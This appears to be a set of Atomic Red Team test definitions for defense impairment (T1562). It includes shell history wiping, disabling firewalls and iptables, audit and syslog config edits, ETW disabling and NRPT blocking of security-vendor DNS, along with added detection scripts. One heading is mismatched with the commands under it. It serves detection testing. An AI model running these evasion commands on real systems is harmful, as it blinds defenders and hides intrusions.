Description: This test simulates an adversary modifying access permissions for a Windows Event Log channel by setting the "CustomSD" registry value. Specifically, it changes the Security Descriptor Definition Language (SDDL) string. These modifications can restrict or grant access to specific users or groups, potentially aiding in defense evasion by controlling who can view or modify an event log channel.
Upon execution, the user shouldn't be able to access the event log channel via the Event Viewer or via utilities such as "Get-EventLog" or "wevtutil".
T1562.003 - Impair Defenses: Impair Command History Logging
Disable history collection
export HISTCONTROL=ignoreboth
whoami
Description: Disables history collection in shells
T1562.003 - Impair Defenses: Impair Command History Logging
Disable history collection (freebsd)
export HISTSIZE=0
whoami
Description: Disables history collection in shells
T1562.003 - Impair Defenses: Impair Command History Logging
Mac HISTCONTROL
{MISSING IN ATOMIC RED TEAM}
Description: The HISTCONTROL variable is set to ignore (not write to the history file) commands that are a duplicate of something already in the history
and commands that start with a space. This atomic sets this variable in the current session and also writes it to the current user's ~/.bash_profile
so that it will apply to all future sessions as well.
https://www.linuxjournal.com/content/using-bash-history-more-efficiently-histcontrol
T1562.003 - Impair Defenses: Impair Command History Logging
Clear bash history
cp $HISTFILE $HISTFILE.OLD
if ((${#HISTFILE[@]})); then echo $HISTFILE; fi
echo "" > $HISTFILE
if [ $(wc -c <$HISTFILE) -gt 1 ]; then echo "$HISTFILE is larger than 1k"; fi
ls -la $HISTFILE
cat $HISTFILE
history -c
if [ $(history |wc -l) -eq 1 ]; then echo "History cache cleared"; fi
Description: An attacker may clear the bash history cache and the history file as their last act before logging off to remove the record of their command line activities.
In this test we use the $HISTFILE variable throughout to: 1. confirm the $HISTFILE variable is set; 2. echo "" into it; 3-5. confirm the file is empty; 6. clear the history cache; 7. confirm the history cache is empty. This is when the attacker would log off.
Cleanup:
mv -f $HISTFILE.OLD $HISTFILE
T1562.003 - Impair Defenses: Impair Command History Logging
Setting the HISTCONTROL environment variable
TEST=$(echo $HISTCONTROL)
if [ "$HISTCONTROL" != "ignoreboth" ]; then export HISTCONTROL="ignoreboth"; fi
history -c
 ls -la $HISTFILE # " ls -la $HISTFILE"
if [ $(history |wc -l) -eq 1 ]; then echo "ls -la is not in history cache"; fi
if [ "$HISTCONTROL" != "erasedups" ]; then export HISTCONTROL="erasedups"; fi
history -c
ls -la $HISTFILE
ls -la $HISTFILE
ls -la $HISTFILE
if [ $(history |wc -l) -eq 2 ]; then echo "Their is only one entry for ls -la $HISTFILE"; fi
Description: An attacker may exploit the space before a command (e.g. " ls") or the duplicate command suppression feature in Bash history to prevent their commands from being recorded in the history file or to obscure the order of commands used.
In this test we: 1. set $HISTCONTROL to ignoreboth; 2. clear the history cache; 3. execute ls -la with a space in front of it; 4. confirm that ls -la is not in the history cache; 5. set $HISTCONTROL to erasedups; 6. clear the history cache; 7-9. execute ls -la $HISTFILE 3 times; 10. confirm that there is only one command in history.
Cleanup:
export HISTCONTROL=$(echo $TEST)
T1562.003 - Impair Defenses: Impair Command History Logging
Setting the HISTFILESIZE environment variable
TEST=$(echo $HISTFILESIZE)
echo $HISTFILESIZE
export HISTFILESIZE=0
echo "runnning some commands to populate the history"
whoami
groups
if [ $(echo $HISTFILESIZE) -eq 0 ]; then echo "\$HISTFILESIZE is zero"; else HIST_LENGHT=$(wc -l $HISTFILE); echo "\$HISTFILESIZE is not zero, history lenght is $HIST_LENGHT"; fi
Description: An adversary may set the bash history file size environment variable (HISTFILESIZE) to zero to prevent the logging of commands to the history file after they log out of the system.
Note: we don't wish to log out, so we are just confirming the value of HISTFILESIZE. In this test we: 1. echo HISTFILESIZE; 2. set it to zero; 3. confirm that HISTFILESIZE is set to zero.
Cleanup:
export HISTCONTROL=$(echo $TEST)
T1562.003 - Impair Defenses: Impair Command History Logging
Setting the HISTSIZE environment variable
echo $HISTSIZE
export HISTSIZE=0
echo "runnning some commands to populate the history"
whoami
groups
if [ $(echo $HISTSIZE) -eq 0 ]; then echo "\$HISTSIZE is zero"; else HIST_LENGTH=$(wc -l $HISTFILE); echo "\$HISTSIZE is not zero, history size is $HIST_LENGTH"; fi
Description: An adversary may set the sh history file size environment variable (HISTSIZE) to zero to prevent the logging of commands to the history file after they log out of the system.
Note: we don't wish to log out, so we are just confirming the value of HISTSIZE. In this test we: 1. echo HISTSIZE; 2. set it to zero; 3. confirm that HISTSIZE is set to zero.
Cleanup:
export HISTSIZE=100
T1562.003 - Impair Defenses: Impair Command History Logging
Setting the HISTFILE environment variable
TEST=$(echo $HISTFILE)
echo $HISTFILE
export HISTFILE="/dev/null"
echo "runnning some commands to populate the history"
whoami
groups
if [ $(echo $HISTFILE) == "/dev/null" ]; then echo "\$HISTFILE is /dev/null"; else HIST_LENGHT=$(wc -l $HISTFILE); echo "\$HISTFILE is not /dev/null, history lenght is $HIST_LENGHT"; fi
Description: An adversary may clear, unset or redirect the history environment variable HISTFILE to prevent logging of commands to the history file after they log out of the system.
Note: we don't wish to log out, so we are just confirming the value of HISTFILE. In this test we: 1. echo HISTFILE; 2. set it to /dev/null; 3. confirm that HISTFILE is set to /dev/null.
Cleanup:
export HISTFILE=$(echo $TEST)
T1562.003 - Impair Defenses: Impair Command History Logging
Setting the HISTFILE environment variable (freebsd)
echo $HISTFILE
export HISTFILE="/dev/null"
if [ "$HISTFILE" = "/dev/null" ]; then echo "\$HISTFILE is /dev/null"; fi
Description: An Adversary may clear, unset or redirect the history environment variable HISTFILE to prevent logging of commands to the history file after they log out of the system.
Note: we don't wish to log out, so we are just confirming the value of HISTFILE. In this test we 1. echo HISTFILE 2. set it to /dev/null 3. confirm that HISTFILE is set to /dev/null.
Cleanup:
export HISTFILE=~/.sh_history
T1562.003 - Impair Defenses: Impair Command History Logging
Setting the HISTIGNORE environment variable
if ((${#HISTIGNORE[@]})); then echo "\$HISTIGNORE = $HISTIGNORE"; else export HISTIGNORE='ls*:rm*:ssh*'; echo "\$HISTIGNORE = $HISTIGNORE"; fi
history -c
ls -la $HISTFILE
ls -la ~/.bash_logout
if [ $(history | wc -l) -eq 1 ]; then echo "ls commands are not in history"; fi
unset HISTIGNORE
if ((${#HISTIGNORE[@]})); then echo "\$HISTIGNORE = $HISTIGNORE"; else export HISTIGNORE='*'; echo "\$HISTIGNORE = $HISTIGNORE"; fi
history -c
whoami
groups
if [ $(history | wc -l) -eq 0 ]; then echo "History cache is empty"; fi
Description: An Adversary may take advantage of the HISTIGNORE environment variable either to ignore particular commands or all commands.
In this test we 1. set HISTIGNORE to ignore ls, rm and ssh commands 2. clear the history cache 3.-4. execute ls commands 5. confirm that the ls commands are not in the history cache 6. unset HISTIGNORE 7. repeat the sequence, this time ignoring ALL commands.
Cleanup:
unset HISTIGNORE
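A check to go with the four history tests above, added here as an example rather than taken from Atomic Red Team: it audits the variables the tests manipulate (HISTFILE, HISTFILESIZE, HISTSIZE, HISTIGNORE) and reports which impairment is present. The function names and the sample values passed in are this example's own.

```bash
#!/usr/bin/env bash
# Added example, not part of Atomic Red Team: audit the variables the four
# T1562.003 tests above manipulate. Values are passed as arguments so the
# same check can be applied to a live shell or to a snapshot of another
# process's environment (e.g. tr '\0' '\n' < /proc/<pid>/environ).
#
#   audit_history_env HISTFILE HISTFILESIZE HISTSIZE HISTIGNORE
#
# Prints one finding per line; returns 0 when nothing looks impaired, 1 otherwise.
audit_history_env() {
    local histfile="$1" histfilesize="$2" histsize="$3" histignore="$4"
    local findings=0 rest pat ignore_all=0 ignore_some=0

    case "$histfile" in
        "")        echo "HISTFILE unset: nothing is written to disk on exit"; findings=$((findings + 1)) ;;
        /dev/null) echo "HISTFILE redirected to /dev/null"; findings=$((findings + 1)) ;;
    esac
    if [ "$histfilesize" = "0" ]; then
        echo "HISTFILESIZE=0: history file is truncated on exit"; findings=$((findings + 1))
    fi
    if [ "$histsize" = "0" ]; then
        echo "HISTSIZE=0: no commands are kept in the session history"; findings=$((findings + 1))
    fi

    # HISTIGNORE is a colon-separated pattern list; a bare '*' entry silences
    # everything. Walk it with parameter expansion so '*' is never glob-expanded.
    rest="$histignore"
    while [ -n "$rest" ]; do
        pat="${rest%%:*}"
        if [ "$pat" = "*" ]; then ignore_all=1; elif [ -n "$pat" ]; then ignore_some=1; fi
        case "$rest" in *:*) rest="${rest#*:}" ;; *) rest="" ;; esac
    done
    if [ "$ignore_all" -eq 1 ]; then
        echo "HISTIGNORE='$histignore' suppresses every command"; findings=$((findings + 1))
    elif [ "$ignore_some" -eq 1 ]; then
        echo "HISTIGNORE='$histignore' hides selected commands (review the patterns)"; findings=$((findings + 1))
    fi

    [ "$findings" -eq 0 ]
}

# Convenience wrapper for the shell you are sitting in. Source this file from
# an interactive shell before calling it: HISTFILE is normally only set there,
# so running it from a script would report HISTFILE as unset.
audit_current_shell() {
    audit_history_env "${HISTFILE-}" "${HISTFILESIZE-}" "${HISTSIZE-}" "${HISTIGNORE-}"
}
```

Because these variables live in each process's environment, auditing your own shell proves little about someone else's session; feed the function values read from /proc/<pid>/environ of other login shells instead. A persistent version of the tampering (export lines in ~/.bashrc, ~/.bash_profile or /etc/profile.d) is better caught by a file-integrity check on those files.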
T1562.003 - Impair Defenses: Impair Command History Logging
Disable Windows Command Line Auditing using reg.exe
Description: In Windows operating systems, command line auditing is controlled through the following registry value:
Registry Path: HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit
Registry Value: ProcessCreationIncludeCmdLine_Enabled
When command line auditing is enabled, the system records detailed information about command execution, including the command executed, the user account responsible for executing the command, and the timestamp of the execution.
This information is crucial for security monitoring and forensic analysis, as it helps organizations detect and investigate unauthorized or malicious activities within their systems.
By default, command line auditing may not be enabled in Windows systems, and administrators must manually configure the appropriate registry settings to activate it.
Conversely, attackers may attempt to tamper with these registry keys to disable command line auditing, as part of their efforts to evade detection and cover their tracks while perpetrating malicious activities.
Because this attack executes reg.exe using a command prompt, this attack can be detected by monitoring both:
Process Creation events for reg.exe (Windows Event ID 4688, Sysmon Event ID 1)
Registry events (Windows Event ID 4657, Sysmon Event ID 13)
Read more here:
https://securitydatasets.com/notebooks/atomic/windows/defense_evasion/SDWIN-220703123711.html
Description: In Windows operating systems, command line auditing is controlled through the following registry value:
Registry Path: HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit
Registry Value: ProcessCreationIncludeCmdLine_Enabled
When command line auditing is enabled, the system records detailed information about command execution, including the command executed, the user account responsible for executing the command, and the timestamp of the execution.
This information is crucial for security monitoring and forensic analysis, as it helps organizations detect and investigate unauthorized or malicious activities within their systems.
By default, command line auditing may not be enabled in Windows systems, and administrators must manually configure the appropriate registry settings to activate it.
Conversely, attackers may attempt to tamper with these registry keys to disable command line auditing, as part of their efforts to evade detection and cover their tracks while perpetrating malicious activities.
Because this attack runs a Powershell cmdlet, this attack can be detected by monitoring both:
Powershell Logging (Windows Powershell Event ID 400, 800, 4103, 4104)
Registry events (Windows Event ID 4657, Sysmon Event ID 13)
Read more here:
https://securitydatasets.com/notebooks/atomic/windows/defense_evasion/SDWIN-220703123711.html
https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/new-itemproperty?view=powershell-7.4#example-2-add-a-registry-entry-to-a-key
T1562.004 - Impair Defenses: Disable or Modify System Firewall
Disable Microsoft Defender Firewall
netsh advfirewall set currentprofile state off
Description: Disables the Microsoft Defender Firewall for the current profile.
Use caution if you are accessing the host remotely, especially with the cleanup command, which re-enables the firewall for the current profile...
Cleanup:
netsh advfirewall set currentprofile state on >nul 2>&1
T1562.004 - Impair Defenses: Disable or Modify System Firewall
Description: Disables the Microsoft Defender Firewall for the public profile via registry
Use caution if you are accessing the host remotely, especially with the cleanup command, which re-enables the firewall for the current profile...
T1562.004 - Impair Defenses: Disable or Modify System Firewall
Allow SMB and RDP on Microsoft Defender Firewall
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
netsh advfirewall firewall set rule group="file and printer sharing" new enable=Yes
Description: Allow all SMB and RDP rules on the Microsoft Defender Firewall for all profiles.
Use caution if you are accessing the host remotely, especially with the cleanup command, which resets the firewall to its defaults and may disable those services...
Cleanup:
netsh advfirewall reset >nul 2>&1
T1562.004 - Impair Defenses: Disable or Modify System Firewall
Description: This test creates a listening interface on a victim device. This tactic was used by HARDRAIN for proxying.
reference: https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-F.pdf
T1562.004 - Impair Defenses: Disable or Modify System Firewall
Stop/Start UFW firewall
ufw disable
Description: Stop the Uncomplicated Firewall (UFW) if installed.
Prereq: Check if ufw is installed on the machine.
if [ ! -x "$(command -v ufw)" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi
if ufw status | grep -q "inactive"; then echo -e "\n***** ufw inactive *****\n"; exit 1; fi
Cleanup:
ufw enable
ufw status verbose
T1562.004 - Impair Defenses: Disable or Modify System Firewall
Stop/Start Packet Filter
service pf stop
service pf disable
Description: Stop the Packet Filter if installed.
Prereq: Check if pfctl is installed on the machine.
if [ ! -x "$(command -v pfctl)" ]; then echo -e "\n***** PF NOT installed *****\n"; exit 1; fi
if [ "$(kldstat -n pf)" = "" ]; then echo -e "\n***** PF inactive *****\n"; exit 1; fi
Cleanup:
service pf enable
service pf start
service pf status
T1562.004 - Impair Defenses: Disable or Modify System Firewall
Stop/Start UFW firewall systemctl
systemctl stop ufw
Description: Stop the Uncomplicated Firewall (UFW) if installed, using systemctl.
Prereq: Check if systemctl and ufw is installed on the machine.
if [ ! -x "$(command -v systemctl)" ]; then echo -e "\n***** systemctl NOT installed *****\n"; exit 1; fi
if [ ! -x "$(command -v ufw)" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi
if ufw status | grep -q "inactive"; then echo -e "\n***** ufw inactive *****\n"; exit 1; fi
Cleanup:
systemctl start ufw
systemctl status ufw
T1562.004 - Impair Defenses: Disable or Modify System Firewall
Turn off UFW logging
ufw logging off
Description: Turn off the Uncomplicated Firewall (UFW) logging.
Prereq: Check if ufw is installed on the machine and enabled.
if [ ! -x "$(command -v ufw)" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi
if ufw status | grep -q "inactive"; then echo -e "\n***** ufw inactive *****\n"; exit 1; fi
Cleanup:
ufw logging low
ufw status verbose
T1562.004 - Impair Defenses: Disable or Modify System Firewall
Add and delete UFW firewall rules
ufw prepend deny from 1.2.3.4
ufw status numbered
Description: Add and delete a rule on the Uncomplicated Firewall (UFW) if installed and enabled.
Prereq: Check if ufw is installed on the machine and enabled.
if [ ! -x "$(command -v ufw)" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi
if ufw status | grep -q "inactive"; then echo -e "\n***** ufw inactive *****\n"; exit 1; fi
T1562.004 - Impair Defenses: Disable or Modify System Firewall
Add and delete Packet Filter rules
echo "block in proto tcp from 1.2.3.4 to any" | pfctl -a pf-rules -f -
pfctl -a pf-rules -s rules
Description: Add and delete a rule on the Packet Filter (PF) if installed and enabled.
Prereq: Check if pf is installed on the machine and enabled.
if [ ! -x "$(command -v pfctl)" ]; then echo -e "\n***** PF NOT installed *****\n"; exit 1; fi
if [ "$(kldstat -n pf)" = "" ]; then echo -e "\n***** PF inactive *****\n"; exit 1; fi
Cleanup:
pfctl -a pf-rules -F rules
sed -i "" '/anchor pf-rules/d' /etc/pf.conf   # drop the anchor line, then reload the ruleset
pfctl -f /etc/pf.conf
T1562.004 - Impair Defenses: Disable or Modify System Firewall
Edit UFW firewall user.rules file
echo "# THIS IS A COMMENT" >> /etc/ufw/user.rules
grep "# THIS IS A COMMENT" /etc/ufw/user.rules
Description: Edit the Uncomplicated Firewall (UFW) rules file /etc/ufw/user.rules.
Prereq: Check if /etc/ufw/user.rules exists.
if [ ! -f "/etc/ufw/user.rules" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi
Cleanup:
sed -i 's/# THIS IS A COMMENT//g' /etc/ufw/user.rules
T1562.004 - Impair Defenses: Disable or Modify System Firewall
Edit UFW firewall ufw.conf file
echo "# THIS IS A COMMENT" >> /etc/ufw/ufw.conf
grep "# THIS IS A COMMENT" /etc/ufw/ufw.conf
Description: Edit the Uncomplicated Firewall (UFW) configuration file /etc/ufw/ufw.conf
which controls if the firewall starts on boot and its logging level.
Prereq: Check if /etc/ufw/ufw.conf exists.
if [ ! -f "/etc/ufw/ufw.conf" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi
Cleanup:
sed -i 's/# THIS IS A COMMENT//g' /etc/ufw/ufw.conf
cat /etc/ufw/ufw.conf
T1562.004 - Impair Defenses: Disable or Modify System Firewall
Edit UFW firewall sysctl.conf file
echo "# THIS IS A COMMENT" >> /etc/ufw/sysctl.conf
grep "# THIS IS A COMMENT" /etc/ufw/sysctl.conf
Description: Edit the Uncomplicated Firewall (UFW) configuration file for setting network
variables /etc/ufw/sysctl.conf.
Prereq: Check if /etc/ufw/sysctl.conf exists.
if [ ! -f "/etc/ufw/sysctl.conf" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi
Cleanup:
sed -i 's/# THIS IS A COMMENT//g' /etc/ufw/sysctl.conf
cat /etc/ufw/sysctl.conf
T1562.004 - Impair Defenses: Disable or Modify System Firewall
Edit UFW firewall main configuration file
echo "# THIS IS A COMMENT" >> /etc/default/ufw
grep "# THIS IS A COMMENT" /etc/default/ufw
Description: Edit the Uncomplicated Firewall (UFW) main configuration file for setting
default policies /etc/default/ufw.
Prereq: Check if /etc/default/ufw exists.
if [ ! -f "/etc/default/ufw" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi
Cleanup:
sed -i 's/# THIS IS A COMMENT//g' /etc/default/ufw
T1562.004 - Impair Defenses: Disable or Modify System Firewall
Tail the UFW firewall log file
tail /var/log/ufw.log
Description: Print the last 10 lines of the Uncomplicated Firewall (UFW) log file
/var/log/ufw.log.
Prereq: Check if /var/log/ufw.log exists.
if [ ! -f "/var/log/ufw.log" ]; then echo -e "\n***** ufw NOT logging *****\n"; exit 1; fi
T1562.004 - Impair Defenses: Disable or Modify System Firewall
Disable iptables
iptables-save > /tmp/iptables.rules
iptables -F
Description: Some Linux systems do not enable ufw and manage firewall rules with iptables directly (ufw is a front-end that generates iptables rules).
iptables is not a service that can be stopped like ufw, but an attacker can flush every rule with iptables -F, which leaves only the chain default policies
(ACCEPT on most distributions) and so effectively disables the firewall. If a chain's policy is DROP, flushing it instead blocks all traffic on that chain, including any remote session to the host.
Prereq: Check if iptables is installed on the machine.
if [ ! -x "$(command -v iptables)" ]; then echo -e "\n***** iptables NOT installed *****\n"; exit 1; fi
Cleanup:
iptables-restore < /tmp/iptables.rules
T1562.004 - Impair Defenses: Disable or Modify System Firewall
Modify/delete iptables firewall rules
iptables -D OUTPUT -p tcp --dport 21 -j DROP
Description: Instead of "disabling" iptables outright, an adversary may delete one specific rule, for example one that blocks data exfiltration over FTP.
This generates far less noise than a flush and is less likely to be detected.
Prereq: Check if iptables is installed on the machine.
if [ ! -x "$(command -v iptables)" ]; then echo -e "\n***** iptables NOT installed *****\n"; exit 1; fi
if ! iptables -L | grep -q "DROP .*dpt:ftp"; then echo -e "\n***** this firewall rule is NOT activated *****\n***** activate it by executing \"iptables -A OUTPUT -p tcp --dport 21 -j DROP\" *****\n"; exit 1; fi
Cleanup:
iptables -A OUTPUT -p tcp --dport 21 -j DROP   # re-add the rule the test deleted (no snapshot is taken by this test)
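One way to turn the snapshot the flush test takes into a detection, as an added example that is not Atomic Red Team code: compare a baseline iptables-save dump against the current one and report whether the ruleset was flushed or a single rule went missing, which covers both the flush test and the single-rule delete test above. The rulesets below are constructed samples in iptables-save format; the function names are this example's own.

```bash
#!/usr/bin/env bash
# Added example, not part of Atomic Red Team: turn the snapshot the flush test
# takes (iptables-save > /tmp/iptables.rules) into a baseline and compare the
# live ruleset against it, so both a full flush (iptables -F) and a single
# deleted rule (iptables -D ...) show up. The rulesets below are constructed
# samples in iptables-save format; on a real host feed in "$(iptables-save)".

BASELINE_RULES='# constructed sample in iptables-save format
*filter
:INPUT ACCEPT [0:0]
:FORWARD DROP [0:0]
:OUTPUT ACCEPT [0:0]
-A INPUT -i lo -j ACCEPT
-A INPUT -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
-A INPUT -p tcp -m tcp --dport 22 -j ACCEPT
-A OUTPUT -p tcp -m tcp --dport 21 -j DROP
COMMIT'

# iptables -F keeps the chains and their policies and removes every rule
FLUSHED_RULES=$(printf '%s\n' "$BASELINE_RULES" | grep -v '^-A')
# iptables -D OUTPUT -p tcp --dport 21 -j DROP removes exactly this line
# (iptables-save prints the rule with the implicit "-m tcp" match)
AFTER_DELETE=$(printf '%s\n' "$BASELINE_RULES" | grep -Fxv -- '-A OUTPUT -p tcp -m tcp --dport 21 -j DROP')

# rule_count: number of -A lines on stdin (prints 0 rather than failing when none)
rule_count() { grep -c '^-A' || true; }

# missing_rules BASELINE CURRENT: baseline rules absent from the current ruleset
missing_rules() {
    printf '%s\n' "$1" | grep '^-A' | while IFS= read -r rule; do
        printf '%s\n' "$2" | grep -Fxq -- "$rule" || printf '%s\n' "$rule"
    done
}

# assess_ruleset BASELINE CURRENT: one-line verdict, non-zero if rules went missing
assess_ruleset() {
    local base_n cur_n missing_n
    base_n=$(printf '%s\n' "$1" | rule_count)
    cur_n=$(printf '%s\n' "$2" | rule_count)
    missing_n=$(missing_rules "$1" "$2" | grep -c '^-A' || true)
    if [ "$base_n" -gt 0 ] && [ "$cur_n" -eq 0 ]; then
        echo "FLUSHED: all $base_n baseline rules removed"; return 1
    elif [ "$missing_n" -gt 0 ]; then
        echo "MODIFIED: $missing_n baseline rule(s) missing"; return 1
    fi
    echo "OK"
}

# Stand-alone demo. On a live host:
#   assess_ruleset "$(cat /tmp/iptables.rules)" "$(iptables-save)"
assess_ruleset "$BASELINE_RULES" "$FLUSHED_RULES"
assess_ruleset "$BASELINE_RULES" "$AFTER_DELETE"
missing_rules "$BASELINE_RULES" "$AFTER_DELETE"
```

On hosts where iptables is the nft-backed compatibility layer, iptables-save still emits this format, but rules added natively with nft do not appear in it; compare nft list ruleset output there instead. A baseline kept in /tmp, as the test does, can be replaced by the same attacker who flushes the rules; keep it off the host or at least hash it.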
T1562.004 - Impair Defenses: Disable or Modify System Firewall
LockBit Black - Unusual Windows firewall registry modification -cmd
sed -i '$ a #art_test_1562_006_1' /etc/audisp/audispd.conf
if [ -f "/etc/auditd.conf" ]; then
  sed -i '$ a #art_test_1562_006_1' /etc/auditd.conf
else
  sed -i '$ a #art_test_1562_006_1' /etc/audit/auditd.conf
fi
sed -i '$ a #art_test_1562_006_1' /etc/libaudit.conf
Description: Emulates modification of auditd configuration files
Cleanup:
sed -i '$ d' /etc/audisp/audispd.conf
if [ -f "/etc/auditd.conf" ]; then
  sed -i '$ d' /etc/auditd.conf
else
  sed -i '$ d' /etc/audit/auditd.conf
fi
sed -i '$ d' /etc/libaudit.conf
Description: Emulates modification of auditd configuration files
Cleanup:
sed -i "" '/#art_test_1562_006_1/d' /etc/security/audit_event
T1562.006 - Impair Defenses: Indicator Blocking
Logging Configuration Changes on Linux Host
if [ -f "/etc/syslog.conf" ]; then sed -i '$ a #art_test_1562_006_2' /etc/syslog.conf; fi
if [ -f "/etc/rsyslog.conf" ]; then sed -i '$ a #art_test_1562_006_2' /etc/rsyslog.conf; fi
if [ -f "/etc/syslog-ng/syslog-ng.conf" ]; then sed -i '$ a #art_test_1562_006_2' /etc/syslog-ng/syslog-ng.conf; fi
Description: Emulates modification of syslog configuration.
Cleanup:
if [ -f "/etc/syslog.conf" ]; then sed -i '$ d' /etc/syslog.conf; fi
if [ -f "/etc/rsyslog.conf" ]; then sed -i '$ d' /etc/rsyslog.conf; fi
if [ -f "/etc/syslog-ng/syslog-ng.conf" ]; then sed -i '$ d' /etc/syslog-ng/syslog-ng.conf; fi
T1562.006 - Impair Defenses: Indicator Blocking
Logging Configuration Changes on FreeBSD Host
if [ -f "/etc/syslog.conf" ]; then echo '#art_test_1562_006_2' >> /etc/syslog.conf; fi
Description: Emulates modification of syslog configuration.
Cleanup:
if [ -f "/etc/syslog.conf" ]; then sed -i "" '/#art_test_1562_006_2/d' /etc/syslog.conf; fi
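The edits made by the UFW configuration tests earlier (/etc/ufw/user.rules, /etc/ufw/ufw.conf, /etc/ufw/sysctl.conf, /etc/default/ufw) and by the auditd and syslog configuration tests just above only append a comment line, which no daemon logs. A hash baseline is the simplest check that notices them. The following is an added example, not Atomic Red Team code; the function names and the scratch configuration contents are chosen for this example.

```bash
#!/usr/bin/env bash
# Added example, not part of Atomic Red Team: a hash baseline for the firewall
# and logging configuration files the tests above append a comment to. The
# appended line is harmless and produces no log of its own, so comparing the
# files against a baseline taken beforehand is the simplest way to surface it.

# Paths the tests above touch; extend as needed. Missing files are skipped.
WATCHED_CONFIGS="/etc/ufw/user.rules /etc/ufw/ufw.conf /etc/ufw/sysctl.conf /etc/default/ufw
/etc/audit/auditd.conf /etc/auditd.conf /etc/audisp/audispd.conf /etc/libaudit.conf
/etc/syslog.conf /etc/rsyslog.conf /etc/syslog-ng/syslog-ng.conf"

# baseline_configs FILE... : prints "sha256  path" for each file that exists
baseline_configs() {
    local f
    for f in "$@"; do
        [ -f "$f" ] && sha256sum -- "$f"
    done
    return 0
}

# verify_configs BASELINE_FILE : prints CHANGED/MISSING lines, returns 1 if any
verify_configs() {
    local changed=0 expected path actual
    while read -r expected path; do
        if [ ! -f "$path" ]; then
            echo "MISSING  $path"; changed=$((changed + 1)); continue
        fi
        actual=$(sha256sum -- "$path" | cut -d' ' -f1)
        if [ "$actual" != "$expected" ]; then
            echo "CHANGED  $path"; changed=$((changed + 1))
        fi
    done < "$1"
    [ "$changed" -eq 0 ]
}

# Demo on constructed scratch files (so it runs without touching /etc):
# baseline two configs, then append a comment the way the tests do.
demo_config_tamper() {
    local dir out
    dir=$(mktemp -d)
    printf 'IPV6=yes\nDEFAULT_INPUT_POLICY="DROP"\n' > "$dir/ufw"
    printf 'local_events = yes\nlog_file = /var/log/audit/audit.log\n' > "$dir/auditd.conf"
    baseline_configs "$dir/ufw" "$dir/auditd.conf" > "$dir/baseline.sha256"
    echo '#art_test_1562_006_1' >> "$dir/auditd.conf"
    out=$(verify_configs "$dir/baseline.sha256" || true)
    rm -rf "$dir"
    printf '%s\n' "$out"
}

# On a real host:
#   baseline_configs $WATCHED_CONFIGS > /var/lib/config-baseline.sha256
#   verify_configs /var/lib/config-baseline.sha256
demo_config_tamper
```

sha256sum -c --quiet baseline.sha256 performs the same comparison as verify_configs in one command; the loop is written out so the MISSING case is explicit. Store the baseline off-host (an account that can append to /etc/audit/auditd.conf can also rewrite a baseline kept next to it), and on auditd-managed hosts add watch rules for these paths (for example -w /etc/audit/ -p wa -k auditconfig) so the write itself is recorded rather than only discovered afterwards.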
Description: This test was created to disable the Microsoft Powershell ETW provider by using the built-in Windows tool, logman.exe. This provider is used as a common source of telemetry in AV/EDR solutions.
Prereq: PSExec must be installed on the machine.
if (Test-Path "..\ExternalPayloads\pstools\PsExec.exe") {exit 0} else {exit 1}
Description: An adversary can disable the ETW Provider of Windows Defender,
so nothing would be logged to Microsoft-Windows-Windows-Defender/Operational anymore.
https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a
Description: An adversary can disable the ETW Provider of Windows Defender,
so nothing would be logged to Microsoft-Windows-Windows-Defender/Operational anymore.
https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a
Description: Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled environment variable to 0 in the HKCU registry using the reg.exe utility. In order for changes to take effect a logout might be required.
Description: Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled environment variable to 0 in the HKCU registry using PowerShell. In order for changes to take effect a logout might be required.
Description: Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled environment variable to 0 in the HKLM registry using the reg.exe utility. In order for changes to take effect a reboot might be required.
Description: Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled environment variable to 0 in the HKLM registry using PowerShell. In order for changes to take effect a reboot might be required.
Block Cybersecurity communication by leveraging Windows Name Resolution Policy Table
Add-DnsClientNrptRule -Namespace ".endpoint.security.microsoft.com" -NameServers 127.0.0.1 -Comment "Silenced by Name Resolution Policy Table"
Add-DnsClientNrptRule -Namespace "endpoint.security.microsoft.com" -NameServers 127.0.0.1 -Comment "Silenced by Name Resolution Policy Table"
Clear-DnsClientCache
Description: Adversaries may redirect DNS queries for a security vendor's domains to an incorrect or attacker-controlled resolver, blocking the agent's legitimate communication with its backend and potentially compromising the security infrastructure. This atomic test adds NRPT rules that send every query for endpoint.security.microsoft.com (and its subdomains) to a name server at 127.0.0.1, so resolution fails unless something is listening there.
Cleanup:
try {
    # Get all NRPT rules created by this test
    $DnsClientNrptRules = Get-DnsClientNrptRule | Where-Object { $_.Comment -eq 'Silenced by Name Resolution Policy Table' }

    # Remove each NRPT rule
    foreach ($rule in $DnsClientNrptRules) { Remove-DnsClientNrptRule -Name $rule.Name -Force }

    # Clear DNS client cache
    Clear-DnsClientCache
    Write-Host "All NRPT rules have been removed and the DNS cache has been cleared."
}
catch {
    # Report a failed cleanup instead of silently leaving the rules in place
    Write-Host "Failed to remove NRPT rules: $_"
}
Description: Identifies an Event Hub deletion in Azure.
An Event Hub is an event processing service that ingests and processes large volumes of events and data.
An adversary may delete an Event Hub in an attempt to evade detection.
https://docs.microsoft.com/en-us/azure/event-hubs/event-hubs-about
Description: You can use the Exchange Management Shell to enable or disable mailbox audit logging for a mailbox.
Unified or Admin Audit logs are disabled via the Exchange Powershell cmdline.
https://github.com/Azure/Azure-Sentinel/blob/master/Detections/OfficeActivity/exchange_auditlogdisabled.yaml
Prereq: ExchangeOnlineManagement PowerShell module must be installed
$RequiredModule = Get-Module -Name ExchangeOnlineManagement -ListAvailable
if (-not $RequiredModule) {exit 1}
